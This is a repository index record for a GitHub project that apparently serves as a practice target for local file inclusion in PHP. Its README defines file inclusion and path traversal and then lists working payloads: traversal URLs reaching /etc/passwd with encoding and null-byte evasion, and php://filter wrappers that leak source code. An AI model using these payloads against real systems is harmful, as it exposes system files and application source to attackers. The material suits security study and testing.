{"id":22360935,"url":"https://github.com/galihap76/web-app-lfi","last_synced_at":"2025-03-26T14:30:12.622Z","repository":{"id":169791301,"uuid":"474606873","full_name":"galihap76/web-app-lfi","owner":"galihap76","description":"My repo to hack my web app about vulnerability local file inclusion.","archived":false,"fork":false,"pushed_at":"2022-04-01T21:03:08.000Z","size":4,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-01-31T15:47:55.148Z","etag":null,"topics":["lfi-vulnerability","local-file-inclusion","php","vulnerability","webapp"],"latest_commit_sha":null,"homepage":"","language":"PHP","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/galihap76.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2022-03-27T10:40:30.000Z","updated_at":"2022-03-27T10:43:32.000Z","dependencies_parsed_at":"2023-06-07T06:45:52.277Z","dependency_job_id":null,"html_url":"https://github.com/galihap76/web-app-lfi","commit_stats":null,"previous_names":["galihap76/web-app-lfi"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/galihap76%2Fweb-app-lfi","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/galihap76%2Fweb-app-lfi/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/galihap76%2Fweb-app-lfi/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/galihap76%2Fweb-app-lfi/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/galihap76","download_url":"https://codeload.github.com/galihap76/web-app-lfi/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":245670425,"owners_count":20653363,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["lfi-vulnerability","local-file-inclusion","php","vulnerability","webapp"],"created_at":"2024-12-04T16:19:26.514Z","updated_at":"2025-03-26T14:30:12.587Z","avatar_url":"https://github.com/galihap76.png","language":"PHP","funding_links":[],"categories":[],"sub_categories":[],"readme":"## Local File Inclusion\nThe File Inclusion vulnerability allows an attacker to include a file, usually exploiting a \"dynamic file inclusion\" mechanisms implemented in the target application. The Path Traversal vulnerability allows an attacker to access a file, usually exploiting a \"reading\" mechanism implemented in the target application.\n\n**Payloads**\n```\nhttp://example.com/index.php?page=../../../etc/passwd\nhttp://example.com/index.php?page=../../../etc/passwd%00\nhttp://example.com/index.php?page=%252e%252e%252fetc%252fpasswd\nhttp://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00\nhttp://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd\nhttp://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00\nhttp://example.com/index.php?page=../../../etc/passwd............[ADD MORE]\nhttp://example.com/index.php?page=../../../etc/passwd\\.\\.\\.\\.\\.\\.[ADD MORE]\nhttp://example.com/index.php?page=../../../etc/passwd/./././././.[ADD MORE] \nhttp://example.com/index.php?page=../../../[ADD MORE]../../../../etc/passwd\nhttp://example.com/index.php?page=....//....//etc/passwd\nhttp://example.com/index.php?page=..///////..////..//////etc/passwd\nhttp://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd\nhttp://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php\nhttp://example.com/index.php?page=php://filter/convert.iconv.utf-8.utf-16/resource=index.php\nhttp://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php\nhttp://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fgalihap76%2Fweb-app-lfi","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fgalihap76%2Fweb-app-lfi","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fgalihap76%2Fweb-app-lfi/lists"}